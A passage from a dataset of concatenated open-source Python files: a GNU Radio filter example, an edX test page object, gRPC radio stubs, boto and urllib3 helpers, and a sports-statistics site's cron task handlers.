print "%s (%s)" % (t.host_type, t.description)
if args.show_types:
show_host_types()
sys.exit(0)
if args.type == "all":
hosts = Host.objects.all()
else:
hosts = Host.objects.filter(host_type__host_type = args.type)
rrd_service = RrdService()
# start num_threads threads for pinging
for i in xrange(args.num_threads):
t = PingThread(queue, rrd_service)
t.setDaemon(True)
t.start()
if args.debug:
print "Pinging %d hosts using %d threads." % (len(hosts), args.num_threads)
# Add all hosts to the queue. Ping threads
# will pick hosts from this queue.
for host in hosts:
queue.put(host)
# Wait for all threads to finish, eg. queue is empty.
queue.join()
sys.exit(0)
| gpl-2.0 |
jarn0ld/gnuradio | gr-filter/examples/synth_filter.py | 58 | 2552 | #!/usr/bin/env python
#
# Copyright 2010,2012,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr
from gnuradio import filter
from gnuradio import blocks
import sys
try:
from gnuradio import analog
except ImportError:
sys.stderr.write("Error: Program requires gr-analog.\n")
sys.exit(1)
try:
import scipy
except ImportError:
sys.stderr.write("Error: Program requires scipy (see: www.scipy.org).\n")
sys.exit(1)
try:
import pylab
except ImportError:
sys.stderr.write("Error: Program requires matplotlib (see: matplotlib.sourceforge.net).\n")
sys.exit(1)
def main():
N = 1000000
fs = 8000
freqs = [100, 200, 300, 400, 500]
nchans = 7
sigs = list()
for fi in freqs:
s = analog.sig_source_c(fs, analog.GR_SIN_WAVE, fi, 1)
sigs.append(s)
taps = filter.firdes.low_pass_2(len(freqs), fs,
fs/float(nchans)/2, 100, 100)
print "Num. Taps = %d (taps per filter = %d)" % (len(taps),
len(taps)/nchans)
filtbank = filter.pfb_synthesizer_ccf(nchans, taps)
head = blocks.head(gr.sizeof_gr_complex, N)
snk = blocks.vector_sink_c()
tb = gr.top_block()
tb.connect(filtbank, head, snk)
for i,si in enumerate(sigs):
tb.connect(si, (filtbank, i))
tb.run()
if 1:
f1 = pylab.figure(1)
s1 = f1.add_subplot(1,1,1)
s1.plot(snk.data()[1000:])
fftlen = 2048
f2 = pylab.figure(2)
s2 = f2.add_subplot(1,1,1)
winfunc = scipy.blackman
s2.psd(snk.data()[10000:], NFFT=fftlen,
Fs = nchans*fs,
noverlap=fftlen/4,
window = lambda d: d*winfunc(fftlen))
pylab.show()
if __name__ == "__main__":
main()
| gpl-3.0 |
xuxiao19910803/edx | common/test/acceptance/pages/lms/courseware_search.py | 81 | 1330 | """
Courseware search
"""
from .course_page import CoursePage
class CoursewareSearchPage(CoursePage):
"""
Coursware page featuring a search form
"""
url_path = "courseware/"
search_bar_selector = '#courseware-search-bar'
@property
def search_results(self):
""" search results list showing """
return self.q(css='#courseware-search-results')
def is_browser_on_page(self):
""" did we find the search bar in the UI """
return self.q(css=self.search_bar_selector).present
def enter_search_term(self, text):
""" enter the search term into the box """
self.q(css=self.search_bar_selector + ' input[type="text"]').fill(text)
def search(self):
""" execute the search """
self.q(css=self.search_bar_selector + ' [type="submit"]').click()
self.wait_for_element_visibility('.search-info', 'Search results are shown')
def search_for_term(self, text):
"""
Fill input and do search
"""
self.enter_search_term(text)
self.search()
def clear_search(self):
"""
Clear search bar after search.
"""
self.q(css=self.search_bar_selector + ' .cancel-button').click()
self.wait_for_element_visibility('#course-content', 'Search bar is cleared')
| agpl-3.0 |
mKaloer/rpi-radio-player | web-radio/web-radio/radiomessages_pb2_grpc.py | 2 | 4849 | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
import google.protobuf.empty_pb2 as google_dot_protobuf_dot_empty__pb2
import radiomessages_pb2 as radiomessages__pb2
class RadioStub(object):
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Play = channel.unary_unary(
'/Radio/Play',
request_serializer=radiomessages__pb2.PlayRequest.SerializeToString,
response_deserializer=radiomessages__pb2.StatusResponse.FromString,
)
self.Stop = channel.unary_unary(
'/Radio/Stop',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=radiomessages__pb2.StatusResponse.FromString,
)
self.Status = channel.unary_unary(
'/Radio/Status',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=radiomessages__pb2.StatusResponse.FromString,
)
self.SetVolume = channel.unary_unary(
'/Radio/SetVolume',
request_serializer=radiomessages__pb2.VolumeRequest.SerializeToString,
response_deserializer=radiomessages__pb2.StatusResponse.FromString,
)
self.SubscribeToUpdates = channel.unary_stream(
'/Radio/SubscribeToUpdates',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=radiomessages__pb2.StatusResponse.FromString,
)
self.UnsubscribeToUpdates = channel.unary_unary(
'/Radio/UnsubscribeToUpdates',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class RadioServicer(object):
def Play(self, request, context):
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stop(self, request, context):
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Status(self, request, context):
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetVolume(self, request, context):
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SubscribeToUpdates(self, request, context):
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UnsubscribeToUpdates(self, request, context):
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_RadioServicer_to_server(servicer, server):
rpc_method_handlers = {
'Play': grpc.unary_unary_rpc_method_handler(
servicer.Play,
request_deserializer=radiomessages__pb2.PlayRequest.FromString,
response_serializer=radiomessages__pb2.StatusResponse.SerializeToString,
),
'Stop': grpc.unary_unary_rpc_method_handler(
servicer.Stop,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=radiomessages__pb2.StatusResponse.SerializeToString,
),
'Status': grpc.unary_unary_rpc_method_handler(
servicer.Status,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=radiomessages__pb2.StatusResponse.SerializeToString,
),
'SetVolume': grpc.unary_unary_rpc_method_handler(
servicer.SetVolume,
request_deserializer=radiomessages__pb2.VolumeRequest.FromString,
response_serializer=radiomessages__pb2.StatusResponse.SerializeToString,
),
'SubscribeToUpdates': grpc.unary_stream_rpc_method_handler(
servicer.SubscribeToUpdates,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=radiomessages__pb2.StatusResponse.SerializeToString,
),
'UnsubscribeToUpdates': grpc.unary_unary_rpc_method_handler(
servicer.UnsubscribeToUpdates,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Radio', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| mit |
azureplus/chromium_depot_tools | third_party/boto/roboto/param.py | 91 | 4533 | # Copyright (c) 2010 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010, Eucalyptus Systems, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import os
class Converter(object):
@classmethod
def convert_string(cls, param, value):
# TODO: could do length validation, etc. here
if not isinstance(value, basestring):
raise ValueError
return value
@classmethod
def convert_integer(cls, param, value):
# TODO: could do range checking here
return int(value)
@classmethod
def convert_boolean(cls, param, value):
"""
For command line arguments, just the presence
of the option means True so just return True
"""
return True
@classmethod
def convert_file(cls, param, value):
if os.path.isfile(value):
return value
raise ValueError
@classmethod
def convert_dir(cls, param, value):
if os.path.isdir(value):
return value
raise ValueError
@classmethod
def convert(cls, param, value):
try:
if hasattr(cls, 'convert_'+param.ptype):
mthd = getattr(cls, 'convert_'+param.ptype)
else:
mthd = cls.convert_string
return mthd(param, value)
except:
raise ValidationException(param, '')
class Param(object):
def __init__(self, name=None, ptype='string', optional=True,
short_name=None, long_name=None, doc='',
metavar=None, cardinality=1, default=None,
choices=None, encoder=None, request_param=True):
self.name = name
self.ptype = ptype
self.optional = optional
self.short_name = short_name
self.long_name = long_name
self.doc = doc
self.metavar = metavar
self.cardinality = cardinality
self.default = default
self.choices = choices
self.encoder = encoder
self.request_param = request_param
@property
def optparse_long_name(self):
ln = None
if self.long_name:
ln = '--%s' % self.long_name
return ln
@property
def synopsis_long_name(self):
ln = None
if self.long_name:
ln = '--%s' % self.long_name
return ln
@property
def getopt_long_name(self):
ln = None
if self.long_name:
ln = '%s' % self.long_name
if self.ptype != 'boolean':
ln += '='
return ln
@property
def optparse_short_name(self):
sn = None
if self.short_name:
sn = '-%s' % self.short_name
return sn
@property
def synopsis_short_name(self):
sn = None
if self.short_name:
sn = '-%s' % self.short_name
return sn
@property
def getopt_short_name(self):
sn = None
if self.short_name:
sn = '%s' % self.short_name
if self.ptype != 'boolean':
sn += ':'
return sn
def convert(self, value):
"""
Convert a string value as received in the command line
tools and convert to the appropriate type of value.
Raise a ValidationError if the value can't be converted.
:type value: str
:param value: The value to convert. This should always
be a string.
"""
return Converter.convert(self, value)
| bsd-3-clause |
gdimitris/FleetManagerBackend | virtual_env/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/fields.py | 1007 | 5833 | import email.utils
import mimetypes
from .packages import six
def guess_content_type(filename, default='application/octet-stream'):
"""
Guess the "Content-Type" of a file.
:param filename:
The filename to guess the "Content-Type" of using :mod:`mimetypes`.
:param default:
If no "Content-Type" can be guessed, default to `default`.
"""
if filename:
return mimetypes.guess_type(filename)[0] or default
return default
def format_header_param(name, value):
"""
Helper function to format and quote a single header parameter.
Particularly useful for header parameters which might contain
non-ASCII values, like file names. This follows RFC 2231, as
suggested by RFC 2388 Section 4.4.
:param name:
The name of the parameter, a string expected to be ASCII only.
:param value:
The value of the parameter, provided as a unicode string.
"""
if not any(ch in value for ch in '"\\\r\n'):
result = '%s="%s"' % (name, value)
try:
result.encode('ascii')
except UnicodeEncodeError:
pass
else:
return result
if not six.PY3: # Python 2:
value = value.encode('utf-8')
value = email.utils.encode_rfc2231(value, 'utf-8')
value = '%s*=%s' % (name, value)
return value
class RequestField(object):
"""
A data container for request body parameters.
:param name:
The name of this request field.
:param data:
The data/value body.
:param filename:
An optional filename of the request field.
:param headers:
An optional dict-like object of headers to initially use for the field.
"""
def __init__(self, name, data, filename=None, headers=None):
self._name = name
self._filename = filename
self.data = data
self.headers = {}
if headers:
self.headers = dict(headers)
@classmethod
def from_tuples(cls, fieldname, value):
"""
A :class:`~urllib3.fields.RequestField` factory from old-style tuple parameters.
Supports constructing :class:`~urllib3.fields.RequestField` from
parameter of key/value strings AND key/filetuple. A filetuple is a
(filename, data, MIME type) tuple where the MIME type is optional.
For example::
'foo': 'bar',
'fakefile': ('foofile.txt', 'contents of foofile'),
'realfile': ('barfile.txt', open('realfile').read()),
'typedfile': ('bazfile.bin', open('bazfile').read(), 'image/jpeg'),
'nonamefile': 'contents of nonamefile field',
Field names and filenames must be unicode.
"""
if isinstance(value, tuple):
if len(value) == 3:
filename, data, content_type = value
else:
filename, data = value
content_type = guess_content_type(filename)
else:
filename = None
content_type = None
data = value
request_param = cls(fieldname, data, filename=filename)
request_param.make_multipart(content_type=content_type)
return request_param
def _render_part(self, name, value):
"""
Overridable helper function to format a single header parameter.
:param name:
The name of the parameter, a string expected to be ASCII only.
:param value:
The value of the parameter, provided as a unicode string.
"""
return format_header_param(name, value)
def _render_parts(self, header_parts):
"""
Helper function to format and quote a single header.
Useful for single headers that are composed of multiple items. E.g.,
'Content-Disposition' fields.
:param header_parts:
A sequence of (k, v) typles or a :class:`dict` of (k, v) to format
as `k1="v1"; k2="v2"; ...`.
"""
parts = []
iterable = header_parts
if isinstance(header_parts, dict):
iterable = header_parts.items()
for name, value in iterable:
if value:
parts.append(self._render_part(name, value))
return '; '.join(parts)
def render_headers(self):
"""
Renders the headers for this request field.
"""
lines = []
sort_keys = ['Content-Disposition', 'Content-Type', 'Content-Location']
for sort_key in sort_keys:
if self.headers.get(sort_key, False):
lines.append('%s: %s' % (sort_key, self.headers[sort_key]))
for header_name, header_value in self.headers.items():
if header_name not in sort_keys:
if header_value:
lines.append('%s: %s' % (header_name, header_value))
lines.append('\r\n')
return '\r\n'.join(lines)
def make_multipart(self, content_disposition=None, content_type=None,
content_location=None):
"""
Makes this request field into a multipart request field.
This method overrides "Content-Disposition", "Content-Type" and
"Content-Location" headers to the request parameter.
:param content_type:
The 'Content-Type' of the request body.
:param content_location:
The 'Content-Location' of the request body.
"""
self.headers['Content-Disposition'] = content_disposition or 'form-data'
self.headers['Content-Disposition'] += '; '.join([
'', self._render_parts(
(('name', self._name), ('filename', self._filename))
)
])
self.headers['Content-Type'] = content_type
self.headers['Content-Location'] = content_location
| mit |
phil-lopreiato/the-blue-alliance | controllers/cron_controller.py | 2 | 31586 | import datetime
import logging
import os
import json
from google.appengine.api import taskqueue
from google.appengine.ext import ndb
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from consts.district_type import DistrictType
from consts.event_type import EventType
from controllers.api.api_status_controller import ApiStatusController
from database.district_query import DistrictsInYearQuery
from database.event_query import DistrictEventsQuery, EventQuery
from database.match_query import EventMatchesQuery
from database.team_query import DistrictTeamsQuery
from helpers.award_manipulator import AwardManipulator
from helpers.bluezone_helper import BlueZoneHelper
from helpers.district_helper import DistrictHelper
from helpers.district_manipulator import DistrictManipulator
from helpers.event_helper import EventHelper
from helpers.event_manipulator import EventManipulator
from helpers.event_details_manipulator import EventDetailsManipulator
from helpers.event_insights_helper import EventInsightsHelper
from helpers.event_team_manipulator import EventTeamManipulator
from helpers.event_team_status_helper import EventTeamStatusHelper
from helpers.event_team_repairer import EventTeamRepairer
from helpers.event_team_updater import EventTeamUpdater
from helpers.firebase.firebase_pusher import FirebasePusher
from helpers.insights_helper import InsightsHelper
from helpers.match_helper import MatchHelper
from helpers.match_time_prediction_helper import MatchTimePredictionHelper
from helpers.matchstats_helper import MatchstatsHelper
from helpers.notification_helper import NotificationHelper
from helpers.outgoing_notification_helper import OutgoingNotificationHelper
from helpers.playoff_advancement_helper import PlayoffAdvancementHelper
from helpers.prediction_helper import PredictionHelper
from helpers.insight_manipulator import InsightManipulator
from helpers.suggestions.suggestion_fetcher import SuggestionFetcher
from helpers.team_manipulator import TeamManipulator
from helpers.match_manipulator import MatchManipulator
from models.district import District
from models.event import Event
from models.event_details import EventDetails
from models.event_team import EventTeam
from models.match import Match
from models.sitevar import Sitevar
from models.suggestion import Suggestion
from models.team import Team
from models.typeahead_entry import TypeaheadEntry
class EventShortNameCalcEnqueue(webapp.RequestHandler):
"""
Enqueues Event short_name computation for official events
"""
def get(self, year):
event_keys = Event.query(Event.official == True, Event.year == int(year)).fetch(200, keys_only=True)
events = ndb.get_multi(event_keys)
for event in events:
taskqueue.add(
url='/tasks/math/do/event_short_name_calc_do/{}'.format(event.key.id()),
method='GET')
template_values = {'events': events}
path = os.path.join(os.path.dirname(__file__), '../templates/math/event_short_name_calc_enqueue.html')
self.response.out.write(template.render(path, template_values))
class EventShortNameCalcDo(webapp.RequestHandler):
"""
Computes Event short_name
"""
def get(self, event_key):
event = Event.get_by_id(event_key)
event.short_name = EventHelper.getShortName(event.name)
EventManipulator.createOrUpdate(event)
template_values = {'event': event}
path = os.path.join(os.path.dirname(__file__), '../templates/math/event_short_name_calc_do.html')
self.response.out.write(template.render(path, template_values))
class EventTeamRepairDo(webapp.RequestHandler):
"""
Repair broken EventTeams.
"""
def get(self):
event_teams_keys = EventTeam.query(EventTeam.year == None).fetch(keys_only=True)
event_teams = ndb.get_multi(event_teams_keys)
event_teams = EventTeamRepairer.repair(event_teams)
event_teams = EventTeamManipulator.createOrUpdate(event_teams)
# sigh. -gregmarra
if type(event_teams) == EventTeam:
event_teams = [event_teams]
template_values = {
'event_teams': event_teams,
}
path = os.path.join(os.path.dirname(__file__), '../templates/math/eventteam_repair_do.html')
self.response.out.write(template.render(path, template_values))
class EventTeamUpdate(webapp.RequestHandler):
"""
Task that updates the EventTeam index for an Event.
Can only update or delete EventTeams for unregistered teams.
^^^ Does it actually do this? Eugene -- 2013/07/30
"""
def get(self, event_key):
_, event_teams, et_keys_to_del = EventTeamUpdater.update(event_key)
if event_teams:
event_teams = filter(lambda et: et.team.get() is not None, event_teams)
event_teams = EventTeamManipulator.createOrUpdate(event_teams)
if et_keys_to_del:
EventTeamManipulator.delete_keys(et_keys_to_del)
template_values = {
'event_teams': event_teams,
'deleted_event_teams_keys': et_keys_to_del
}
path = os.path.join(os.path.dirname(__file__),
'../templates/math/eventteam_update_do.html')
self.response.out.write(template.render(path, template_values))
class EventTeamUpdateEnqueue(webapp.RequestHandler):
"""
Handles enqueing building attendance for Events.
"""
def get(self, when):
if when == "all":
event_keys = Event.query().fetch(10000, keys_only=True)
else:
event_keys = Event.query(Event.year == int(when)).fetch(10000, keys_only=True)
for event_key in event_keys:
taskqueue.add(
url='/tasks/math/do/eventteam_update/' + event_key.id(),
method='GET')
template_values = {
'event_keys': event_keys,
}
path = os.path.join(os.path.dirname(__file__), '../templates/math/eventteam_update_enqueue.html')
self.response.out.write(template.render(path, template_values))
class EventMatchstatsDo(webapp.RequestHandler):
"""
Calculates match stats (OPR/DPR/CCWM) for an event
Calculates predictions for an event
Calculates insights for an event
"""
def get(self, event_key):
event = Event.get_by_id(event_key)
matchstats_dict = MatchstatsHelper.calculate_matchstats(event.matches, event.year)
if any([v != {} for v in matchstats_dict.values()]):
pass
else:
logging.warn("Matchstat calculation for {} failed!".format(event_key))
matchstats_dict = None
predictions_dict = None
if event.year in {2016, 2017, 2018, 2019, 2020} and event.event_type_enum in EventType.SEASON_EVENT_TYPES or event.enable_predictions:
sorted_matches = MatchHelper.play_order_sort_matches(event.matches)
match_predictions, match_prediction_stats, stat_mean_vars = PredictionHelper.get_match_predictions(sorted_matches)
ranking_predictions, ranking_prediction_stats = PredictionHelper.get_ranking_predictions(sorted_matches, match_predictions)
predictions_dict = {
'match_predictions': match_predictions,
'match_prediction_stats': match_prediction_stats,
'stat_mean_vars': stat_mean_vars,
'ranking_predictions': ranking_predictions,
'ranking_prediction_stats': ranking_prediction_stats
}
event_insights = EventInsightsHelper.calculate_event_insights(event.matches, event.year)
event_details = EventDetails(
id=event_key,
matchstats=matchstats_dict,
predictions=predictions_dict,
insights=event_insights,
)
EventDetailsManipulator.createOrUpdate(event_details)
template_values = {
'matchstats_dict': matchstats_dict,
}
if 'X-Appengine-Taskname' not in self.request.headers: # Only write out if not in taskqueue
path = os.path.join(os.path.dirname(__file__), '../templates/math/event_matchstats_do.html')
self.response.out.write(template.render(path, template_values))
def post(self):
self.get()
class EventMatchstatsEnqueue(webapp.RequestHandler):
"""
Enqueues Matchstats calculation
"""
def get(self, when):
if when == "now":
events = EventHelper.getEventsWithinADay()
else:
events = Event.query(Event.year == int(when)).fetch(500)
EventHelper.sort_events(events)
for event in events:
taskqueue.add(
queue_name='run-in-order', # Because predictions depend on past events
url='/tasks/math/do/event_matchstats/' + event.key_name,
method='GET')
template_values = {
'event_count': len(events),
'year': when
}
path = os.path.join(os.path.dirname(__file__), '../templates/math/event_matchstats_enqueue.html')
self.response.out.write(template.render(path, template_values))
class FinalMatchesRepairDo(webapp.RequestHandler):
"""
Repairs zero-indexed final matches
"""
def get(self, year):
year_event_keys = Event.query(Event.year == int(year)).fetch(1000, keys_only=True)
final_match_keys = []
for event_key in year_event_keys:
final_match_keys.extend(Match.query(Match.event == event_key, Match.comp_level == 'f').fetch(100, keys_only=True))
match_keys_to_repair = []
for match_key in final_match_keys:
key_name = match_key.id()
if '_f0m' in key_name:
match_keys_to_repair.append(match_key)
deleted_keys = []
matches_to_repair = ndb.get_multi(match_keys_to_repair)
for match in matches_to_repair:
deleted_keys.append(match.key)
event = ndb.get_multi([match.event])[0]
match.set_number = 1
match.key = ndb.Key(Match, Match.renderKeyName(
event.key.id(),
match.comp_level,
match.set_number,
match.match_number))
MatchManipulator.createOrUpdate(matches_to_repair)
MatchManipulator.delete_keys(deleted_keys)
template_values = {'deleted_keys': deleted_keys,
'new_matches': matches_to_repair}
path = os.path.join(os.path.dirname(__file__), '../templates/math/final_matches_repair_do.html')
self.response.out.write(template.render(path, template_values))
class YearInsightsEnqueue(webapp.RequestHandler):
"""
Enqueues Insights calculation of a given kind for a given year
"""
def get(self, kind, year):
taskqueue.add(
target='backend-tasks-b2',
url='/backend-tasks-b2/math/do/insights/{}/{}'.format(kind, year),
method='GET')
template_values = {
'kind': kind,
'year': year
}
path = os.path.join(os.path.dirname(__file__), '../templates/math/year_insights_enqueue.html')
self.response.out.write(template.render(path, template_values))
class YearInsightsDo(webapp.RequestHandler):
"""
Calculates insights of a given kind for a given year.
Calculations of a given kind should reuse items fetched from the datastore.
"""
def get(self, kind, year):
year = int(year)
insights = None
if kind == 'matches':
insights = InsightsHelper.doMatchInsights(year)
elif kind == 'awards':
insights = InsightsHelper.doAwardInsights(year)
elif kind == 'predictions':
insights = InsightsHelper.doPredictionInsights(year)
if insights != None:
InsightManipulator.createOrUpdate(insights)
template_values = {
'insights': insights,
'year': year,
'kind': kind,
}
path = os.path.join(os.path.dirname(__file__), '../templates/math/year_insights_do.html')
self.response.out.write(template.render(path, template_values))
def post(self):
self.get()
class OverallInsightsEnqueue(webapp.RequestHandler):
"""
Enqueues Overall Insights calculation for a given kind.
"""
def get(self, kind):
taskqueue.add(
target='backend-tasks-b2',
url='/backend-tasks-b2/math/do/overallinsights/{}'.format(kind),
method='GET')
template_values = {
'kind': kind,
}
path = os.path.join(os.path.dirname(__file__), '../templates/math/overall_insights_enqueue.html')
self.response.out.write(template.render(path, template_values))
class OverallInsightsDo(webapp.RequestHandler):
"""
Calculates overall insights of a given kind.
Calculations of a given kind should reuse items fetched from the datastore.
"""
def get(self, kind):
insights = None
if kind == 'matches':
insights = InsightsHelper.doOverallMatchInsights()
elif kind == 'awards':
insights = InsightsHelper.doOverallAwardInsights()
if insights != None:
InsightManipulator.createOrUpdate(insights)
template_values = {
'insights': insights,
'kind': kind,
}
path = os.path.join(os.path.dirname(__file__), '../templates/math/overall_insights_do.html')
self.response.out.write(template.render(path, template_values))
def post(self):
self.get()
class TypeaheadCalcEnqueue(webapp.RequestHandler):
"""
Enqueues typeahead calculations
"""
def get(self):
taskqueue.add(
target='backend-tasks-b2',
url='/backend-tasks-b2/math/do/typeaheadcalc',
method='GET')
template_values = {}
path = os.path.join(os.path.dirname(__file__), '../templates/math/typeaheadcalc_enqueue.html')
self.response.out.write(template.render(path, template_values))
class TypeaheadCalcDo(webapp.RequestHandler):
"""
Calculates typeahead entries
"""
def get(self):
@ndb.tasklet
def get_events_async():
event_keys = yield Event.query().order(-Event.year).order(Event.name).fetch_async(keys_only=True)
events = yield ndb.get_multi_async(event_keys)
raise ndb.Return(events)
@ndb.tasklet
def get_teams_async():
team_keys = yield Team.query().order(Team.team_number).fetch_async(keys_only=True)
teams = yield ndb.get_multi_async(team_keys)
raise ndb.Return(teams)
@ndb.tasklet
def get_districts_async():
district_keys = yield District.query().order(-District.year).fetch_async(keys_only=True)
districts = yield ndb.get_multi_async(district_keys)
raise ndb.Return(districts)
@ndb.toplevel
def get_events_teams_districts():
events, teams, districts = yield get_events_async(), get_teams_async(), get_districts_async()
raise ndb.Return((events, teams, districts))
events, teams, districts = get_events_teams_districts()
results = {}
for team in teams:
if not team.nickname:
nickname = "Team %s" % team.team_number
else:
nickname = team.nickname
data = '%s | %s' % (team.team_number, nickname)
if TypeaheadEntry.ALL_TEAMS_KEY in results:
results[TypeaheadEntry.ALL_TEAMS_KEY].append(data)
else:
results[TypeaheadEntry.ALL_TEAMS_KEY] = [data]
for district in districts:
data = '%s District [%s]' % (district.display_name, district.abbreviation.upper())
# all districts
if TypeaheadEntry.ALL_DISTRICTS_KEY in results:
if data not in results[TypeaheadEntry.ALL_DISTRICTS_KEY]:
results[TypeaheadEntry.ALL_DISTRICTS_KEY].append(data)
else:
results[TypeaheadEntry.ALL_DISTRICTS_KEY] = [data]
for event in events:
data = '%s %s [%s]' % (event.year, event.name, event.event_short.upper())
# all events
if TypeaheadEntry.ALL_EVENTS_KEY in results:
results[TypeaheadEntry.ALL_EVENTS_KEY].append(data)
else:
results[TypeaheadEntry.ALL_EVENTS_KEY] = [data]
# events by year
if TypeaheadEntry.YEAR_EVENTS_KEY.format(event.year) in results:
results[TypeaheadEntry.YEAR_EVENTS_KEY.format(event.year)].append(data)
else:
results[TypeaheadEntry.YEAR_EVENTS_KEY.format(event.year)] = [data]
# Prepare to remove old entries
old_entry_keys_future = TypeaheadEntry.query().fetch_async(keys_only=True)
# Add new entries
entries = []
for key_name, data in results.items():
entries.append(TypeaheadEntry(id=key_name, data_json=json.dumps(data)))
ndb.put_multi(entries)
# Remove old entries
old_entry_keys = set(old_entry_keys_future.get_result())
new_entry_keys = set([ndb.Key(TypeaheadEntry, key_name) for key_name in results.keys()])
keys_to_delete = old_entry_keys.difference(new_entry_keys)
logging.info("Removing the following unused TypeaheadEntries: {}".format([key.id() for key in keys_to_delete]))
ndb.delete_multi(keys_to_delete)
template_values = {'results': results}
path = os.path.join(os.path.dirname(__file__), '../templates/math/typeaheadcalc_do.html')
self.response.out.write(template.render(path, template_values))
class DistrictPointsCalcEnqueue(webapp.RequestHandler):
"""
Enqueues calculation of district points for all season events for a given year
"""
def get(self, year):
year = int(year)
event_keys = Event.query(Event.year == year, Event.event_type_enum.IN(EventType.SEASON_EVENT_TYPES)).fetch(None, keys_only=True)
for event_key in event_keys:
taskqueue.add(url='/tasks/math/do/district_points_calc/{}'.format(event_key.id()), method='GET')
self.response.out.write("Enqueued for: {}".format([event_key.id() for event_key in event_keys]))
class DistrictPointsCalcDo(webapp.RequestHandler):
"""
Calculates district points for an event
"""
def get(self, event_key):
event = Event.get_by_id(event_key)
if event.event_type_enum not in EventType.SEASON_EVENT_TYPES and not self.request.get('allow-offseason', None):
if 'X-Appengine-Taskname' not in self.request.headers:
self.response.out.write("Can't calculate district points for a non-season event {}!"
.format(event.key_name))
return
district_points = DistrictHelper.calculate_event_points(event)
event_details = EventDetails(
id=event_key,
district_points=district_points
)
EventDetailsManipulator.createOrUpdate(event_details)
if 'X-Appengine-Taskname' not in self.request.headers: # Only write out if not in taskqueue
self.response.out.write(event.district_points)
# Enqueue task to update rankings
if event.district_key:
taskqueue.add(url='/tasks/math/do/district_rankings_calc/{}'.format(event.district_key.id()), method='GET')
class DistrictRankingsCalcEnqueue(webapp.RequestHandler):
"""
Enqueues calculation of rankings for all districts for a given year
"""
def get(self, year):
districts = DistrictsInYearQuery(int(year)).fetch()
district_keys = [district.key.id() for district in districts]
for district_key in district_keys:
taskqueue.add(url='/tasks/math/do/district_rankings_calc/{}'.format(district_key), method='GET')
taskqueue.add(url='/backend-tasks/get/district_rankings/{}'.format(district_key), method='GET')
self.response.out.write("Enqueued for: {}".format(district_keys))
class DistrictRankingsCalcDo(webapp.RequestHandler):
"""
Calculates district rankings for a district year
"""
def get(self, district_key):
district = District.get_by_id(district_key)
if not district:
self.response.out.write("District {} does not exist!".format(district_key))
return
events_future = DistrictEventsQuery(district_key).fetch_async()
teams_future = DistrictTeamsQuery(district_key).fetch_async()
events = events_future.get_result()
for event in events:
event.prep_details()
EventHelper.sort_events(events)
team_totals = DistrictHelper.calculate_rankings(events, teams_future, district.year)
rankings = []
current_rank = 1
for key, points in team_totals:
point_detail = {}
point_detail["rank"] = current_rank
point_detail["team_key"] = key
point_detail["event_points"] = []
for event, event_points in points["event_points"]:
event_points['event_key'] = event.key.id()
event_points['district_cmp'] = (
event.event_type_enum == EventType.DISTRICT_CMP or
event.event_type_enum == EventType.DISTRICT_CMP_DIVISION)
point_detail["event_points"].append(event_points)
point_detail["rookie_bonus"] = points.get("rookie_bonus", 0)
point_detail["point_total"] = points["point_total"]
rankings.append(point_detail)
current_rank += 1
